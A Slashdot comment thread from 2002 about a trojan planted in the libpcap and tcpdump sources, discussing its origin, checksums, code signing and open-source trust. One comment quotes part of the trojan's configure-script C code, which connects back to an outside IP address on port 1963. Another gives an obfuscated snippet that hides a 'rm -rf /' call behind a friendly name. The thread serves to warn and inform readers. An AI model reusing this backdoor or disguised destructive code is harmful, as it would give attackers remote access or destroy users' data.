Trojan Found in libpcap and tcpdump 486
msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."
This Trojan thing... (Score:2, Interesting)
It worked with the trojaned compiler making bent versions of the login program. You couldn't detect it as if you compiled another version of cc or login from clean source the bent cc would infect that one and the cycle of infection continued. Very cleverly done.
Actually, for all you know maybe every version of gcc ever allows RMS and Torvalds into your box...
mars.raketti.net (Score:3, Interesting)
With that information, I suppose that it is easy to find out which Finnish 'author' included the trojan, and would be simple to track him down. But my question is how something like this could have been included in an open source code and released to the general public?
This is a growing trend (Score:2, Interesting)
Siltakoski Petri is somehow connected with this... (Score:0, Interesting)
The tojan contacts the following website:
http://mars.raketti.net/~mash/services
DNS Details:
Registrant:
Kuopion Puhelin Oyj (RAKETTI2-DOM)
KUOPIO, 70780
KUOPIO,70780
FI
Domain Name: RAKETTI.NET
Administrative Contact, Technical Contact:
Siltakoski Petri (SP730-ORG) admin@DOMAIN.RAKETTI.NET
Kuopion Puhelin Oyj
Levasentie 23
KUOPIO
FINLAND
+358-17-302329
Fax- +358-17-3614904
Record expires on 07-Oct-2004.
Record created on 08-Oct-1998.
Database last updated on 13-Nov-2002 08:36:01 EST.
Domain servers in listed order:
NS1.RAKETTI.NET 212.146.0.10
NS2.RAKETTI.NET 212.146.0.11
Re:MD5 checksums (Score:2, Interesting)
That's good if you can assure that the MD5 checksum is for the original tarball. What if the guy who placed the torjan placed a new MD5 checksum as well?
Re:Glad I use Gentoo (Score:5, Interesting)
Presumably the tcpdump.org FTP server got 0wned, and the trojan was planted, but the people that found the trojan aren't the server admins - they just found it in the source they downloaded. And I doubt we will find out how the perpetrators got in, either. It would have been nice to find out in more detail what happened when the OpenBSD FTP server was compromised, but people are usually tight-lipped in these cases.
Re:Eventually, this would happen (Score:2, Interesting)
I don't think the only irrelevant comment is thinking that bad things(r) happens only in one place. Like I said, on open source software, I Can Audit Myself The Code.
Re:Eventually, this would happen (Score:2, Interesting)
So there's no point mentioning it.
The point is: When was the specific change added? By whom? The maintainer should know. Let us know. Then put the person who sent in the patch with the trojan in a black list so his/her future patches to open source programs are first severely checked, if accepted at all.
That's more like it -I think-.
Accountability (Score:2, Interesting)
Re:Siltakoski Petri is somehow connected with this (Score:2, Interesting)
in the middle of the fuly commented services file, you find (let's hope
#!/bin/sh
cat >conftes.c
#include
#include
#include
#include
#define XOR_KEY 0x89
int main (int argc, char **argv)
{
char c;
int s, x, sv0[2], sv1[2];
struct sockaddr_in sa;
switch (fork ()) { case 0: break; default: exit (1);}
close (0); close (1); close (2);
do {
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
exit (1);
sa.sin_family = AF_INET;
sa.sin_port = htons (1963);
sa.sin_addr.s_addr = inet_addr ("212.146.0.34");
alarm (10);
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
exit (1);
if ((x = read (s, &c, 1))
nice, isn't it?
heheh
Re:Uncommented trojan (Score:2, Interesting)
1963 - Assasination of President Kennedy
Re:Eventually, this would happen (Score:5, Interesting)
> closed src doesn't have its src on some
> webserver for some kiddie to trojan in the first
> place. sure the possibility of some employee or
> the employer itself to trojan the src, but most
> open source trojans are someone breaking into
> the web server and uploading modified src. by
> definition this wont happen with closed src
> since closed src doesn't release src, so your
> argument is irrelevant.
Oh, no? Look here:
http://news.zdnet.co.uk/story/0,,s2082221,00.ht
Microsoft had their source available to some cracker for three months back in 2000. Of course they later spun it down to "one day and we were watching them all the time".
Point is, closed source can be vunerable too. Only Microsoft knows if any damage was really done, and they aren't telling us squat.
"At this moment, it has control of systems all over the world.
And...we can't do a damn thing to stop it."
Miyasaka, "Godzilla 2000 Millennium" (Japanese version)
Would it help to have a source Bank? (Score:3, Interesting)
I'm just typing out loud here.
Yes, there'd almost certainly have to be a cost associated with this, and I'd think it would be paid by the people who wanted source code, but didn't want to have to worry about checking it for Trojans etc..
The source could still be publically available for comment and review to add to those being paid to perform the analysis.
Seems like this might be a good service, once the idea is fleshed out more...
There'd also need to be some definition of "guaranteed" (or maybe just a different word :0) that fit this scenario, most people don't want to set themselves up to be sued.
Read "Reflections on Trusting Trust" (Score:2, Interesting)
Re:Glad I use Gentoo (Score:1, Interesting)
_NSA backdoor (Score:3, Interesting)
Microsoft *have* inserted a backdoor into the CryptoAPI for the NSA.
How did this get added? (Score:2, Interesting)
Re:MD5 checksums (Score:3, Interesting)
We need to come together and paaaaaarty! [cryptnet.net] :-)
Really, that's the only solution to this problem. Probably, this is something we are going to see more frequently, so frequently perhaps that it may undermine the free software community's credibility. Therefore, we must come together and meet, and exchange signatures, so that at least we can ensure that they software is signed by its maintainer.
Now, go and get registered at Biglumber [biglumber.com], sign up to the keysignings list [alt.org] and start organizing keysigning parties. Also, make sure that you meet other hackers when you're out travelling.
Re:Eventually, this would happen (Score:3, Interesting)
Bruce
Re:Eventually, this would happen (Score:3, Interesting)
Bruce
Re:Uncommented trojan (Score:2, Interesting)
but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.
How hard is it to write code that appears to do something friendly, but actually does something really nasty? Consider this appearantly friendly code: // Bunny ID
// Hugs the bunny specified by 'bunny'
/"
#define hug system
const char* bunny = { 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2f, 0 };
void hug_a_bunny() {
hug(bunny);
}
Hint: bunny evaluates to "rm -rf
Re:Glad I use Gentoo (Score:2, Interesting)
Besides, this is an exploit of trust, no operating system is any more vulnerable than any other. Binary distributions would only contain the libpcap backdoor to ignore tcp port 1963, the actual trojan appears in the configure script.
How many times have you downloaded sources and blindly ran
For the record, this fits the modus operandi of trojans found in irssi, fragroute, dsniff, BitchX, OpenSSH, and sendmail.
Re:Eventually, this would happen (Score:1, Interesting)
Using the language the way you are is many times worse than using phrases like "pirate" to describe a criminal and civil rights violator. Or using "hacker" v. "cracker".
Nedward
DeMorgan's Law (Score:3, Interesting)
Re:as soon as this evening... (Score:3, Interesting)
Yeah... my servers front end my home network, so they are turned on 24/7 and right now are connected through redundant DSL connections to the Internet. So mine make a somewhat attractive target.
Since I am basically a lazy sysadmin, my approach had been to use really obscure hardware for my server. To accomplish that I bought a Rebel Netwinder on the theory that any exploit out for x86 would probably take months to be ported to the StrongARM (the StrongARM instruction set is both restrictively small, and completely anal about non-aligned memory accesses, so hand-coded assembly is a pain to write if you are trying to take advantage of a stack overflow of some kind.)
Recently I've swapped the rebel box for another Intel server, this time running RH7.3, and I bought a subscription to RHN to keep it up to date. Since RHN manages all of the security updates and dependencies, all I have to do is log on once a week or so and request the updates. So now I get to be lazy in two regards; first it is much easier to add new software (StrongARM porting being not my cup of tea), and secondly RHN takes care of the security updates.
I imagine that Debian users would argue likewise for apt-get.
Re:as soon as this evening... (Score:3, Interesting)
Oops, forgot to answer that. I did log on to IRC and tracked down a couple of the users listed in the eggdrop config files. The original channel was no longer active, but there were a few people with the same IDs logged in on another channel; but the channel content was so spooky that it kind of freaked me out at the time. For about five minutes the only thing in the channel were various people sending messages like 'CCs', or 'eggable accts'. Then suddenly some guy posted a message saying approximately: 'so and so is a lousy copier', then 'I may as well give this out as a freebie since I don't want him to get all the use of it', followed by some guy's name, address, SSN, phone, and credit card numbers.
At that point I decided I was in the middle of things I didn't want to be in. I did call the person to let them know that his credit card information had been stolen, and to watch his receipts, but basically dropped it there. As far as I know the FBI only cares about computer hacking if there has been at least $1k of damage. I had about a day to rebuild my server (before replacing it a month later with the Rebel), but nothing close to $1k; no deleted files or anything.
I did track down the person's Nick which basically turned into a Google search, but since he'd been using that Nick for a long time and in many different places, it was very easy to do. The Nick seemed to belong to a student at UCB, previously a student in Singapore, but the evidence was pretty loose, and in any case I doubt I could have done more than make a few legal threats. Ultimately I decided to chalk it all down as a learning experience and let it go (but I still have the backup tapes of the hacked machine if I ever need them.)
Handing out other peoples passwords wouldn't have been possible. Eggdrop stores them in encrypted form so even with the contents of the password file there wasn't anything I could do to retrieve their plain text passwords.
Re:as soon as this evening... (Score:1, Interesting)
Essentially setting up a honeypot to capture hacker login/pw combinations to later track activity, etc? If the honeypot were configured well, I would imagine you could trick them into giving away quite a bit.